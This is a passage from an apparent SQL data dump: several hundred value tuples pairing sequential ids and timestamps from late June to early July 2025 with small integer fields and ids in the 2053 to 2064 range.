(18005, '2025-06-27 04:12:38', 1, 2059, 0, 1, 1),
(18006, '2025-06-27 04:26:33', 1, 2064, 0, 1, 1),
(18007, '2025-06-27 05:34:26', 1, 2055, 0, 1, 1),
(18008, '2025-06-27 05:34:31', 1, 2064, 0, 1, 1),
(18009, '2025-06-27 05:34:35', 1, 2063, 0, 1, 1),
(18010, '2025-06-27 05:34:38', 1, 2062, 0, 1, 1),
(18011, '2025-06-27 05:34:41', 1, 2060, 0, 1, 1),
(18012, '2025-06-27 06:34:26', 1, 2059, 0, 1, 1),
(18013, '2025-06-27 07:33:12', 1, 2064, 0, 1, 1),
(18014, '2025-06-27 08:31:25', 1, 2053, 0, 1, 1),
(18015, '2025-06-27 09:17:27', 1, 2063, 0, 1, 1),
(18016, '2025-06-27 11:01:20', 1, 2058, 0, 1, 1),
(18017, '2025-06-27 12:14:03', 1, 2064, 0, 1, 1),
(18018, '2025-06-27 13:19:27', 1, 2053, 0, 1, 1),
(18019, '2025-06-27 13:40:45', 1, 2060, 0, 1, 1),
(18020, '2025-06-27 14:33:57', 1, 2064, 0, 1, 1),
(18021, '2025-06-27 15:05:41', 1, 2062, 0, 1, 1),
(18022, '2025-06-27 16:38:08', 1, 2064, 0, 1, 1),
(18023, '2025-06-27 19:17:12', 1, 2060, 0, 1, 1),
(18024, '2025-06-27 19:34:54', 1, 2060, 0, 1, 1),
(18025, '2025-06-27 19:42:01', 1, 2063, 0, 1, 1),
(18026, '2025-06-27 20:01:13', 1, 2058, 0, 1, 1),
(18027, '2025-06-27 20:50:16', 1, 2055, 0, 1, 1),
(18028, '2025-06-27 21:09:59', 1, 2053, 0, 1, 1),
(18029, '2025-06-27 21:10:16', 1, 2064, 0, 1, 1),
(18030, '2025-06-27 21:32:54', 1, 2064, 0, 1, 1),
(18031, '2025-06-27 21:42:41', 1, 2059, 0, 1, 1),
(18032, '2025-06-27 22:16:09', 1, 2061, 0, 1, 1),
(18033, '2025-06-27 22:58:32', 1, 2062, 0, 1, 1),
(18034, '2025-06-28 00:13:10', 1, 2054, 0, 1, 1),
(18035, '2025-06-28 00:28:44', 1, 2059, 0, 1, 1),
(18036, '2025-06-28 00:40:39', 1, 2064, 0, 1, 1),
(18037, '2025-06-28 01:44:58', 1, 2053, 0, 1, 1),
(18038, '2025-06-28 01:50:17', 1, 2064, 0, 1, 1),
(18039, '2025-06-28 02:38:56', 1, 2060, 0, 1, 1),
(18040, '2025-06-28 03:05:36', 1, 2053, 0, 1, 1),
(18041, '2025-06-28 03:28:08', 1, 2063, 0, 1, 1),
(18042, '2025-06-28 04:43:41', 1, 2064, 0, 1, 1),
(18043, '2025-06-28 04:53:24', 1, 2063, 0, 1, 1),
(18044, '2025-06-28 05:22:51', 1, 2061, 0, 1, 1),
(18045, '2025-06-28 05:43:06', 1, 2062, 0, 1, 1),
(18046, '2025-06-28 06:23:19', 1, 2061, 0, 1, 1),
(18047, '2025-06-28 06:32:32', 1, 2060, 0, 1, 1),
(18048, '2025-06-28 08:27:43', 1, 2063, 0, 1, 1),
(18049, '2025-06-28 08:55:29', 1, 2064, 0, 1, 1),
(18050, '2025-06-28 09:39:21', 1, 2060, 0, 1, 1),
(18051, '2025-06-28 10:58:24', 1, 2058, 0, 1, 1),
(18052, '2025-06-28 11:06:52', 1, 2055, 0, 1, 1),
(18053, '2025-06-28 11:18:06', 1, 2054, 0, 1, 1),
(18054, '2025-06-28 11:57:50', 1, 2058, 0, 1, 1),
(18055, '2025-06-28 12:17:14', 1, 2054, 0, 1, 1),
(18056, '2025-06-28 12:46:19', 1, 2064, 0, 1, 1),
(18057, '2025-06-28 13:22:59', 1, 2064, 0, 1, 1),
(18058, '2025-06-28 13:35:38', 1, 2061, 0, 1, 1),
(18059, '2025-06-28 14:20:24', 1, 2053, 0, 1, 1),
(18060, '2025-06-28 14:41:41', 1, 2062, 0, 1, 1),
(18061, '2025-06-28 19:27:45', 1, 2063, 0, 1, 1),
(18062, '2025-06-28 19:35:03', 1, 2053, 0, 1, 1),
(18063, '2025-06-28 19:45:59', 1, 2064, 0, 1, 1),
(18064, '2025-06-28 21:17:19', 1, 2060, 0, 1, 1),
(18065, '2025-06-28 23:57:08', 1, 2053, 0, 1, 1),
(18066, '2025-06-29 00:47:38', 1, 2058, 0, 1, 1),
(18067, '2025-06-29 01:49:32', 1, 2064, 0, 1, 1),
(18068, '2025-06-29 02:27:26', 1, 2053, 0, 1, 1),
(18069, '2025-06-29 02:36:01', 1, 2060, 0, 1, 1),
(18070, '2025-06-29 03:37:45', 1, 2061, 0, 1, 1),
(18071, '2025-06-29 04:22:29', 1, 2064, 0, 1, 1),
(18072, '2025-06-29 07:43:28', 1, 2064, 0, 1, 1),
(18073, '2025-06-29 08:38:16', 1, 2053, 0, 1, 1),
(18074, '2025-06-29 10:24:58', 1, 2054, 0, 1, 1),
(18075, '2025-06-29 12:05:04', 1, 2064, 0, 1, 1),
(18076, '2025-06-29 12:14:16', 1, 2060, 0, 1, 1),
(18077, '2025-06-29 12:34:31', 1, 2063, 0, 1, 1),
(18078, '2025-06-29 12:46:19', 1, 2062, 0, 1, 1),
(18079, '2025-06-29 12:59:03', 1, 2059, 0, 1, 1),
(18080, '2025-06-29 13:10:22', 1, 2054, 0, 1, 1),
(18081, '2025-06-29 13:12:04', 1, 2064, 0, 1, 1),
(18082, '2025-06-29 13:18:36', 1, 2055, 0, 1, 1),
(18083, '2025-06-29 13:25:41', 1, 2053, 0, 1, 1),
(18084, '2025-06-29 13:26:31', 1, 2058, 0, 1, 1),
(18085, '2025-06-29 14:01:33', 1, 2064, 0, 1, 1),
(18086, '2025-06-29 14:15:07', 1, 2060, 0, 1, 1),
(18087, '2025-06-29 14:34:58', 1, 2053, 0, 1, 1),
(18088, '2025-06-29 14:56:22', 1, 2062, 0, 1, 1),
(18089, '2025-06-29 17:07:52', 1, 2064, 0, 1, 1),
(18090, '2025-06-29 20:10:35', 1, 2053, 0, 1, 1),
(18091, '2025-06-29 20:53:02', 1, 2060, 0, 1, 1),
(18092, '2025-06-29 22:11:29', 1, 2053, 0, 1, 1),
(18093, '2025-06-30 01:48:15', 1, 2064, 0, 1, 1),
(18094, '2025-06-30 01:58:51', 1, 2060, 0, 1, 1),
(18095, '2025-06-30 02:31:15', 1, 2054, 0, 1, 1),
(18096, '2025-06-30 03:27:56', 1, 2053, 0, 1, 1),
(18097, '2025-06-30 08:04:08', 1, 2064, 0, 1, 1),
(18098, '2025-06-30 11:51:44', 1, 2063, 0, 1, 1),
(18099, '2025-06-30 12:56:44', 1, 2062, 0, 1, 1),
(18100, '2025-06-30 13:49:29', 1, 2053, 0, 1, 1),
(18101, '2025-06-30 14:40:25', 1, 2060, 0, 1, 1),
(18102, '2025-06-30 15:04:45', 1, 2062, 0, 1, 1),
(18103, '2025-06-30 16:47:18', 1, 2064, 0, 1, 1),
(18104, '2025-06-30 18:12:55', 1, 2054, 0, 1, 1),
(18105, '2025-06-30 18:13:03', 1, 2061, 0, 1, 1),
(18106, '2025-06-30 19:46:37', 1, 2060, 0, 1, 1),
(18107, '2025-06-30 19:46:55', 1, 2064, 0, 1, 1),
(18108, '2025-06-30 20:08:22', 1, 2064, 0, 1, 1),
(18109, '2025-06-30 20:40:40', 1, 2063, 0, 1, 1),
(18110, '2025-06-30 22:32:31', 1, 2062, 0, 1, 1),
(18111, '2025-06-30 22:32:31', 1, 2063, 0, 1, 1),
(18112, '2025-06-30 22:32:31', 1, 2061, 0, 1, 1),
(18113, '2025-06-30 23:12:15', 1, 2060, 0, 1, 1),
(18114, '2025-07-01 01:16:32', 1, 2054, 0, 1, 1),
(18115, '2025-07-01 02:46:31', 1, 2053, 0, 1, 1),
(18116, '2025-07-01 03:59:03', 1, 2060, 0, 1, 1),
(18117, '2025-07-01 04:23:04', 1, 2064, 0, 1, 1),
(18118, '2025-07-01 04:31:28', 1, 2060, 0, 1, 1),
(18119, '2025-07-01 04:42:20', 1, 2063, 0, 1, 1),
(18120, '2025-07-01 04:50:51', 1, 2061, 0, 1, 1),
(18121, '2025-07-01 05:13:15', 1, 2062, 0, 1, 1),
(18122, '2025-07-01 06:05:57', 1, 2059, 0, 1, 1),
(18123, '2025-07-01 06:47:52', 1, 2060, 0, 1, 1),
(18124, '2025-07-01 09:02:48', 1, 2055, 0, 1, 1),
(18125, '2025-07-01 09:39:49', 1, 2064, 0, 1, 1),
(18126, '2025-07-01 10:18:05', 1, 2055, 0, 1, 1),
(18127, '2025-07-01 10:49:14', 1, 2054, 0, 1, 1),
(18128, '2025-07-01 10:58:37', 1, 2064, 0, 1, 1),
(18129, '2025-07-01 11:07:36', 1, 2058, 0, 1, 1),
(18130, '2025-07-01 11:57:48', 1, 2053, 0, 1, 1),
(18131, '2025-07-01 13:13:31', 1, 2058, 0, 1, 1),
(18132, '2025-07-01 14:34:32', 1, 2053, 0, 1, 1),
(18133, '2025-07-01 14:36:45', 1, 2054, 0, 1, 1),
(18134, '2025-07-01 15:02:53', 1, 2062, 0, 1, 1),
(18135, '2025-07-01 15:02:54', 1, 2054, 0, 1, 1),
(18136, '2025-07-01 15:05:46', 1, 2053, 0, 1, 1),
(18137, '2025-07-01 15:05:49', 1, 2054, 0, 1, 1),
(18138, '2025-07-01 15:05:52', 1, 2054, 0, 1, 1),
(18139, '2025-07-01 15:06:10', 1, 2063, 0, 1, 1),
(18140, '2025-07-01 15:06:13', 1, 2062, 0, 1, 1),
(18141, '2025-07-01 15:06:16', 1, 2060, 0, 1, 1),
(18142, '2025-07-01 15:06:19', 1, 2059, 0, 1, 1),
(18143, '2025-07-01 15:06:22', 1, 2059, 0, 1, 1),
(18144, '2025-07-01 15:06:25', 1, 2061, 0, 1, 1),
(18145, '2025-07-01 15:06:27', 1, 2058, 0, 1, 1),
(18146, '2025-07-01 16:57:33', 1, 2061, 0, 1, 1),
(18147, '2025-07-01 17:01:04', 1, 2063, 0, 1, 1),
(18148, '2025-07-01 17:25:40', 1, 2062, 0, 1, 1),
(18149, '2025-07-01 20:00:15', 1, 2062, 0, 1, 1),
(18150, '2025-07-01 21:41:29', 1, 2054, 0, 1, 1),
(18151, '2025-07-01 22:28:21', 1, 2060, 0, 1, 1),
(18152, '2025-07-02 06:08:39', 1, 2063, 0, 1, 1),
(18153, '2025-07-02 06:53:42', 1, 2062, 0, 1, 1),
(18154, '2025-07-02 08:37:37', 1, 2062, 0, 1, 1),
(18155, '2025-07-02 11:03:06', 1, 2064, 0, 1, 1),
(18156, '2025-07-02 11:37:37', 1, 2063, 0, 1, 1),
(18157, '2025-07-02 11:37:50', 1, 2055, 0, 1, 1),
(18158, '2025-07-02 11:38:50', 1, 2053, 0, 1, 1),
(18159, '2025-07-02 11:57:10', 1, 2064, 0, 1, 1),
(18160, '2025-07-02 14:49:31', 1, 2062, 0, 1, 1),
(18161, '2025-07-02 17:01:19', 1, 2064, 0, 1, 1),
(18162, '2025-07-02 18:54:41', 1, 2053, 0, 1, 1),
(18163, '2025-07-02 19:07:57', 1, 2053, 0, 1, 1),
(18164, '2025-07-02 19:33:40', 1, 2058, 0, 1, 1),
(18165, '2025-07-02 20:40:41', 1, 2062, 0, 1, 1),
(18166, '2025-07-02 21:03:28', 1, 2061, 0, 1, 1),
(18167, '2025-07-02 21:07:32', 1, 2054, 0, 1, 1),
(18168, '2025-07-02 21:11:52', 1, 2058, 0, 1, 1),
(18169, '2025-07-02 21:24:25', 1, 2055, 0, 1, 1),
(18170, '2025-07-02 21:28:39', 1, 2061, 0, 1, 1),
(18171, '2025-07-02 21:30:59', 1, 2054, 0, 1, 1),
(18172, '2025-07-02 21:37:14', 1, 2058, 0, 1, 1),
(18173, '2025-07-02 22:49:52', 1, 2061, 0, 1, 1),
(18174, '2025-07-02 23:30:57', 1, 2064, 0, 1, 1),
(18175, '2025-07-03 00:14:16', 1, 2063, 0, 1, 1),
(18176, '2025-07-03 02:31:39', 1, 2059, 0, 1, 1),
(18177, '2025-07-03 02:40:12', 1, 2060, 0, 1, 1),
(18178, '2025-07-03 02:57:22', 1, 2062, 0, 1, 1),
(18179, '2025-07-03 03:14:06', 1, 2054, 0, 1, 1),
(18180, '2025-07-03 03:27:20', 1, 2063, 0, 1, 1),
(18181, '2025-07-03 03:38:27', 1, 2063, 0, 1, 1),
(18182, '2025-07-03 03:41:02', 1, 2060, 0, 1, 1),
(18183, '2025-07-03 03:59:34', 1, 2060, 0, 1, 1),
(18184, '2025-07-03 04:09:39', 1, 2064, 0, 1, 1),
(18185, '2025-07-03 04:53:47', 1, 2064, 0, 1, 1),
(18186, '2025-07-03 06:22:29', 1, 2064, 0, 1, 1),
(18187, '2025-07-03 06:52:59', 1, 2059, 0, 1, 1),
(18188, '2025-07-03 06:53:59', 1, 2059, 0, 1, 1),
(18189, '2025-07-03 07:15:21', 1, 2055, 0, 1, 1),
(18190, '2025-07-03 07:30:15', 1, 2059, 0, 1, 1),
(18191, '2025-07-03 07:43:06', 1, 2063, 0, 1, 1),
(18192, '2025-07-03 07:45:10', 1, 2060, 0, 1, 1),
(18193, '2025-07-03 08:43:12', 1, 2058, 0, 1, 1),
(18194, '2025-07-03 09:15:44', 1, 2059, 0, 1, 1),
(18195, '2025-07-03 09:24:32', 1, 2060, 0, 1, 1),
(18196, '2025-07-03 09:47:00', 1, 2055, 0, 1, 1),
(18197, '2025-07-03 10:16:14', 1, 2059, 0, 1, 1),
(18198, '2025-07-03 10:35:23', 1, 2064, 0, 1, 1),
(18199, '2025-07-03 11:33:31', 1, 2055, 0, 1, 1),
(18200, '2025-07-03 11:37:14', 1, 2058, 0, 1, 1),
(18201, '2025-07-03 12:00:56', 1, 2058, 0, 1, 1),
(18202, '2025-07-03 12:04:22', 1, 2064, 0, 1, 1),
(18203, '2025-07-03 12:16:24', 1, 2059, 0, 1, 1),
(18204, '2025-07-03 13:40:35', 1, 2060, 0, 1, 1),
(18205, '2025-07-03 14:51:42', 1, 2062, 0, 1, 1),
(18206, '2025-07-03 17:15:08', 1, 2062, 0, 1, 1),
(18207, '2025-07-03 17:40:55', 1, 2059, 0, 1, 1),
(18208, '2025-07-03 19:28:49', 1, 2054, 0, 1, 1),
(18209, '2025-07-03 20:22:06', 1, 2060, 0, 1, 1),
(18210, '2025-07-03 21:40:30', 1, 2053, 0, 1, 1),
(18211, '2025-07-03 21:51:10', 1, 2060, 0, 1, 1),
(18212, '2025-07-03 22:11:38', 1, 2054, 0, 1, 1),
(18213, '2025-07-03 22:32:44', 1, 2063, 0, 1, 1),
(18214, '2025-07-03 23:35:39', 1, 2064, 0, 1, 1),
(18215, '2025-07-03 23:37:37', 1, 2063, 0, 1, 1),
(18216, '2025-07-03 23:40:25', 1, 2064, 0, 1, 1),
(18217, '2025-07-03 23:40:42', 1, 2061, 0, 1, 1),
(18218, '2025-07-03 23:42:56', 1, 2055, 0, 1, 1),
(18219, '2025-07-03 23:47:26', 1, 2062, 0, 1, 1),
(18220, '2025-07-03 23:51:12', 1, 2059, 0, 1, 1),
(18221, '2025-07-03 23:53:16', 1, 2055, 0, 1, 1),
(18222, '2025-07-03 23:54:52', 1, 2060, 0, 1, 1),
(18223, '2025-07-04 00:00:21', 1, 2054, 0, 1, 1),
(18224, '2025-07-04 00:11:04', 1, 2064, 0, 1, 1),
(18225, '2025-07-04 00:18:43', 1, 2054, 0, 1, 1),
(18226, '2025-07-04 00:25:46', 1, 2058, 0, 1, 1),
(18227, '2025-07-04 00:37:01', 1, 2062, 0, 1, 1),
(18228, '2025-07-04 00:59:52', 1, 2061, 0, 1, 1),
(18229, '2025-07-04 01:27:29', 1, 2064, 0, 1, 1),
(18230, '2025-07-04 02:07:35', 1, 2063, 0, 1, 1),
(18231, '2025-07-04 02:25:52', 1, 2060, 0, 1, 1),
(18232, '2025-07-04 05:28:34', 1, 2060, 0, 1, 1),
(18233, '2025-07-04 05:42:31', 1, 2064, 0, 1, 1),
(18234, '2025-07-04 09:55:32', 1, 2064, 0, 1, 1),
(18235, '2025-07-04 12:28:36', 1, 2053, 0, 1, 1),
(18236, '2025-07-04 14:53:32', 1, 2062, 0, 1, 1),
(18237, '2025-07-04 18:56:44', 1, 2063, 0, 1, 1),
(18238, '2025-07-04 19:56:22', 1, 2053, 0, 1, 1),
(18239, '2025-07-05 01:37:40', 1, 2053, 0, 1, 1),
(18240, '2025-07-05 02:54:16', 1, 2061, 0, 1, 1),
(18241, '2025-07-05 06:43:37', 1, 2064, 0, 1, 1),
(18242, '2025-07-05 06:45:05', 1, 2062, 0, 1, 1),
(18243, '2025-07-05 06:45:14', 1, 2060, 0, 1, 1),
(18244, '2025-07-05 06:46:22', 1, 2063, 0, 1, 1),
(18245, '2025-07-05 06:46:46', 1, 2061, 0, 1, 1),
(18246, '2025-07-05 06:46:54', 1, 2059, 0, 1, 1),
(18247, '2025-07-05 06:47:04', 1, 2058, 0, 1, 1),
(18248, '2025-07-05 06:47:18', 1, 2055, 0, 1, 1),
(18249, '2025-07-05 06:47:25', 1, 2054, 0, 1, 1),
(18250, '2025-07-05 06:47:31', 1, 2060, 0, 1, 1),
(18251, '2025-07-05 07:17:13', 1, 2053, 0, 1, 1),
(18252, '2025-07-05 10:58:11', 1, 2061, 0, 1, 1),
(18253, '2025-07-05 11:34:30', 1, 2059, 0, 1, 1),
(18254, '2025-07-05 13:45:20', 1, 2064, 0, 1, 1),
(18255, '2025-07-05 15:02:58', 1, 2062, 0, 1, 1),
(18256, '2025-07-05 20:19:49', 1, 2060, 0, 1, 1),
(18257, '2025-07-05 22:01:03', 1, 2061, 0, 1, 1),
(18258, '2025-07-05 22:39:13', 1, 2063, 0, 1, 1),
(18259, '2025-07-06 03:12:13', 1, 2064, 0, 1, 1),
(18260, '2025-07-06 07:21:47', 1, 2053, 0, 1, 1),
(18261, '2025-07-06 13:44:06', 1, 2060, 0, 1, 1),
(18262, '2025-07-06 13:50:11', 1, 2063, 0, 1, 1),
(18263, '2025-07-06 14:05:19', 1, 2058, 0, 1, 1),
(18264, '2025-07-06 14:34:31', 1, 2055, 0, 1, 1),
(18265, '2025-07-06 14:40:08', 1, 2064, 0, 1, 1),
(18266, '2025-07-06 15:11:02', 1, 2062, 0, 1, 1),
(18267, '2025-07-06 15:24:41', 1, 2061, 0, 1, 1),
(18268, '2025-07-06 15:53:53', 1, 2062, 0, 1, 1),
(18269, '2025-07-06 16:53:54', 1, 2060, 0, 1, 1),
(18270, '2025-07-06 16:54:52', 1, 2054, 0, 1, 1),
(18271, '2025-07-06 17:10:50', 1, 2059, 0, 1, 1),
(18272, '2025-07-06 17:23:30', 1, 2064, 0, 1, 1),
(18273, '2025-07-06 23:31:33', 1, 2054, 0, 1, 1),
(18274, '2025-07-07 01:03:01', 1, 2064, 0, 1, 1),
(18275, '2025-07-07 03:43:05', 1, 2058, 0, 1, 1),
(18276, '2025-07-07 04:41:47', 1, 2060, 0, 1, 1),
(18277, '2025-07-07 04:47:45', 1, 2063, 0, 1, 1),
(18278, '2025-07-07 05:02:14', 1, 2058, 0, 1, 1),
(18279, '2025-07-07 05:29:24', 1, 2055, 0, 1, 1),
(18280, '2025-07-07 06:21:10', 1, 2061, 0, 1, 1),
(18281, '2025-07-07 06:53:30', 1, 2062, 0, 1, 1),
(18282, '2025-07-07 08:00:29', 1, 2054, 0, 1, 1),
(18283, '2025-07-07 08:16:04', 1, 2059, 0, 1, 1),
(18284, '2025-07-07 08:28:36', 1, 2064, 0, 1, 1),
(18285, '2025-07-07 09:27:24', 1, 2060, 0, 1, 1),
(18286, '2025-07-07 09:34:38', 1, 2063, 0, 1, 1),
(18287, '2025-07-07 09:52:39', 1, 2058, 0, 1, 1),
(18288, '2025-07-07 10:42:57', 1, 2060, 0, 1, 1),
(18289, '2025-07-07 10:56:14', 1, 2063, 0, 1, 1),
(18290, '2025-07-07 11:07:51', 1, 2055, 0, 1, 1),
(18291, '2025-07-07 11:12:18', 1, 2053, 0, 1, 1),
(18292, '2025-07-07 11:29:41', 1, 2058, 0, 1, 1),
(18293, '2025-07-07 12:34:17', 1, 2055, 0, 1, 1),
(18294, '2025-07-07 12:48:21', 1, 2064, 0, 1, 1),
(18295, '2025-07-07 14:22:10', 1, 2061, 0, 1, 1),
(18296, '2025-07-07 14:43:14', 1, 2062, 0, 1, 1),
(18297, '2025-07-07 15:22:45', 1, 2062, 0, 1, 1),
(18298, '2025-07-07 15:55:54', 1, 2061, 0, 1, 1),
(18299, '2025-07-07 16:32:40', 1, 2060, 0, 1, 1),
(18300, '2025-07-07 16:38:35', 1, 2063, 0, 1, 1),
(18301, '2025-07-07 16:53:11', 1, 2058, 0, 1, 1),
(18302, '2025-07-07 17:18:13', 1, 2060, 0, 1, 1),
(18303, '2025-07-07 17:25:46', 1, 2063, 0, 1, 1),
(18304, '2025-07-07 17:44:20', 1, 2058, 0, 1, 1),
(18305, '2025-07-07 18:21:19', 1, 2060, 0, 1, 1),
(18306, '2025-07-07 18:28:35', 1, 2063, 0, 1, 1),
(18307, '2025-07-07 18:40:50', 1, 2060, 0, 1, 1),
(18308, '2025-07-07 18:46:17', 1, 2058, 0, 1, 1),
(18309, '2025-07-07 19:12:30', 1, 2060, 0, 1, 1),
(18310, '2025-07-07 19:14:52', 1, 2053, 0, 1, 1),
(18311, '2025-07-07 19:19:47', 1, 2063, 0, 1, 1),
(18312, '2025-07-07 19:38:04', 1, 2058, 0, 1, 1),
(18313, '2025-07-07 20:14:29', 1, 2055, 0, 1, 1),
(18314, '2025-07-07 21:18:29', 1, 2061, 0, 1, 1),
(18315, '2025-07-07 21:53:06', 1, 2058, 0, 1, 1),
(18316, '2025-07-07 21:56:08', 1, 2062, 0, 1, 1),
(18317, '2025-07-07 22:25:52', 1, 2060, 0, 1, 1),
(18318, '2025-07-07 22:28:44', 1, 2062, 0, 1, 1),
(18319, '2025-07-07 22:35:45', 1, 2064, 0, 1, 1),
(18320, '2025-07-07 22:47:09', 1, 2059, 0, 1, 1),
(18321, '2025-07-07 22:49:13', 1, 2060, 0, 1, 1),
(18322, '2025-07-07 22:57:07', 1, 2063, 0, 1, 1),
(18323, '2025-07-07 22:57:43', 1, 2063, 0, 1, 1),
(18324, '2025-07-07 22:57:47', 1, 2061, 0, 1, 1),
(18325, '2025-07-07 22:57:50', 1, 2062, 0, 1, 1),
(18326, '2025-07-07 23:16:37', 1, 2058, 0, 1, 1),
(18327, '2025-07-07 23:53:45', 1, 2055, 0, 1, 1),
(18328, '2025-07-07 23:54:21', 1, 2061, 0, 1, 1),
(18329, '2025-07-08 00:48:26', 1, 2060, 0, 1, 1),
(18330, '2025-07-08 00:53:16', 1, 2061, 0, 1, 1),
(18331, '2025-07-08 00:55:49', 1, 2063, 0, 1, 1),
(18332, '2025-07-08 01:13:54', 1, 2058, 0, 1, 1),
(18333, '2025-07-08 01:49:29', 1, 2055, 0, 1, 1),
(18334, '2025-07-08 02:51:42', 1, 2061, 0, 1, 1),
(18335, '2025-07-08 03:28:19', 1, 2062, 0, 1, 1),
(18336, '2025-07-08 03:59:57', 1, 2062, 0, 1, 1),
(18337, '2025-07-08 04:03:54', 1, 2060, 0, 1, 1),
(18338, '2025-07-08 04:44:50', 1, 2054, 0, 1, 1),
(18339, '2025-07-08 05:02:07', 1, 2059, 0, 1, 1),
(18340, '2025-07-08 05:15:36', 1, 2064, 0, 1, 1),
(18341, '2025-07-08 05:38:19', 1, 2064, 0, 1, 1),
(18342, '2025-07-08 05:47:03', 1, 2063, 0, 1, 1),
(18343, '2025-07-08 06:18:10', 1, 2060, 0, 1, 1),
(18344, '2025-07-08 06:29:40', 1, 2058, 0, 1, 1),
(18345, '2025-07-08 06:49:54', 1, 2063, 0, 1, 1),
(18346, '2025-07-08 06:58:03', 1, 2060, 0, 1, 1),
(18347, '2025-07-08 07:29:16', 1, 2060, 0, 1, 1),
(18348, '2025-07-08 07:35:43', 1, 2063, 0, 1, 1),
(18349, '2025-07-08 07:51:14', 1, 2058, 0, 1, 1),
(18350, '2025-07-08 08:26:10', 1, 2055, 0, 1, 1),
(18351, '2025-07-08 09:16:43', 1, 2060, 0, 1, 1),
(18352, '2025-07-08 09:22:29', 1, 2063, 0, 1, 1),
(18353, '2025-07-08 09:42:51', 1, 2060, 0, 1, 1),
(18354, '2025-07-08 09:48:34', 1, 2063, 0, 1, 1),
(18355, '2025-07-08 10:03:09', 1, 2058, 0, 1, 1),
(18356, '2025-07-08 10:28:43', 1, 2061, 0, 1, 1),
(18357, '2025-07-08 10:30:40', 1, 2055, 0, 1, 1),
(18358, '2025-07-08 11:21:06', 1, 2061, 0, 1, 1),
(18359, '2025-07-08 11:43:02', 1, 2055, 0, 1, 1),
(18360, '2025-07-08 11:50:50', 1, 2062, 0, 1, 1),
(18361, '2025-07-08 11:54:21', 1, 2054, 0, 1, 1),
(18362, '2025-07-08 11:57:19', 1, 2055, 0, 1, 1),
(18363, '2025-07-08 12:32:13', 1, 2055, 0, 1, 1),
(18364, '2025-07-08 12:53:14', 1, 2054, 0, 1, 1),
(18365, '2025-07-08 13:09:08', 1, 2059, 0, 1, 1),
(18366, '2025-07-08 13:22:00', 1, 2064, 0, 1, 1),
(18367, '2025-07-08 13:53:29', 1, 2060, 0, 1, 1),
(18368, '2025-07-08 13:59:19', 1, 2063, 0, 1, 1),
(18369, '2025-07-08 14:14:13', 1, 2058, 0, 1, 1),
(18370, '2025-07-08 14:42:20', 1, 2055, 0, 1, 1),
(18371, '2025-07-08 15:01:19', 1, 2062, 0, 1, 1),
(18372, '2025-07-08 15:34:01', 1, 2061, 0, 1, 1),
(18373, '2025-07-08 16:04:18', 1, 2062, 0, 1, 1),
(18374, '2025-07-08 17:07:24', 1, 2054, 0, 1, 1),
(18375, '2025-07-08 17:23:03', 1, 2059, 0, 1, 1),
(18376, '2025-07-08 17:48:36', 1, 2060, 0, 1, 1),
(18377, '2025-07-08 17:54:38', 1, 2063, 0, 1, 1),
(18378, '2025-07-08 18:09:40', 1, 2058, 0, 1, 1),
(18379, '2025-07-08 18:41:12', 1, 2060, 0, 1, 1),
(18380, '2025-07-08 18:47:09', 1, 2063, 0, 1, 1),
(18381, '2025-07-08 19:17:04', 1, 2060, 0, 1, 1),
(18382, '2025-07-08 19:24:06', 1, 2063, 0, 1, 1),
(18383, '2025-07-08 19:36:16', 1, 2064, 0, 1, 1),
(18384, '2025-07-08 19:36:21', 1, 2064, 0, 1, 1),
(18385, '2025-07-08 19:40:57', 1, 2062, 0, 1, 1),
(18386, '2025-07-08 19:41:13', 1, 2053, 0, 1, 1),
(18387, '2025-07-08 19:41:56', 1, 2058, 0, 1, 1),
(18388, '2025-07-08 19:42:04', 1, 2061, 0, 1, 1),
(18389, '2025-07-08 19:42:42', 1, 2062, 0, 1, 1),
(18390, '2025-07-08 19:43:31', 1, 2061, 0, 1, 1),
(18391, '2025-07-08 19:43:43', 1, 2063, 0, 1, 1),
(18392, '2025-07-08 19:45:54', 1, 2059, 0, 1, 1),
(18393, '2025-07-08 19:46:11', 1, 2058, 0, 1, 1),
(18394, '2025-07-08 19:46:16', 1, 2063, 0, 1, 1),
(18395, '2025-07-08 19:49:31', 1, 2055, 0, 1, 1),
(18396, '2025-07-08 19:50:09', 1, 2059, 0, 1, 1),
(18397, '2025-07-08 19:50:22', 1, 2054, 0, 1, 1),
(18398, '2025-07-08 19:50:27', 1, 2058, 0, 1, 1),
(18399, '2025-07-08 19:50:39', 1, 2060, 0, 1, 1),
(18400, '2025-07-08 19:55:25', 1, 2055, 0, 1, 1),
(18401, '2025-07-08 19:55:28', 1, 2054, 0, 1, 1),
(18402, '2025-07-08 20:00:52', 1, 2054, 0, 1, 1),
(18403, '2025-07-08 20:17:12', 1, 2060, 0, 1, 1),
(18404, '2025-07-08 20:28:29', 1, 2064, 0, 1, 1),
(18405, '2025-07-08 20:34:39', 1, 2060, 0, 1, 1),
(18406, '2025-07-08 20:42:40', 1, 2063, 0, 1, 1),
(18407, '2025-07-08 21:03:27', 1, 2058, 0, 1, 1),
(18408, '2025-07-08 21:13:03', 1, 2058, 0, 1, 1),
(18409, '2025-07-08 21:16:45', 1, 2060, 0, 1, 1),
(18410, '2025-07-08 21:22:17', 1, 2063, 0, 1, 1),
(18411, '2025-07-08 21:36:06', 1, 2058, 0, 1, 1),
(18412, '2025-07-08 21:44:27', 1, 2054, 0, 1, 1),
(18413, '2025-07-08 22:02:38', 1, 2055, 0, 1, 1),
(18414, '2025-07-08 22:53:01', 1, 2061, 0, 1, 1),
(18415, '2025-07-08 23:37:18', 1, 2060, 0, 1, 1),
(18416, '2025-07-08 23:43:01', 1, 2063, 0, 1, 1),
(18417, '2025-07-08 23:45:13', 1, 2059, 0, 1, 1),
(18418, '2025-07-08 23:57:12', 1, 2058, 0, 1, 1),
(18419, '2025-07-09 00:25:10', 1, 2055, 0, 1, 1),
(18420, '2025-07-09 01:23:29', 1, 2061, 0, 1, 1),
(18421, '2025-07-09 01:52:44', 1, 2053, 0, 1, 1),
(18422, '2025-07-09 01:58:13', 1, 2062, 0, 1, 1),
(18423, '2025-07-09 02:17:19', 1, 2060, 0, 1, 1),
(18424, '2025-07-09 03:10:16', 1, 2054, 0, 1, 1),
(18425, '2025-07-09 03:22:09', 1, 2064, 0, 1, 1),
(18426, '2025-07-09 03:22:34', 1, 2061, 0, 1, 1),
(18427, '2025-07-09 03:22:40', 1, 2060, 0, 1, 1),
(18428, '2025-07-09 03:22:46', 1, 2059, 0, 1, 1),
(18429, '2025-07-09 03:22:51', 1, 2063, 0, 1, 1),
(18430, '2025-07-09 03:23:07', 1, 2062, 0, 1, 1),
(18431, '2025-07-09 03:23:12', 1, 2054, 0, 1, 1),
(18432, '2025-07-09 03:23:18', 1, 2055, 0, 1, 1),
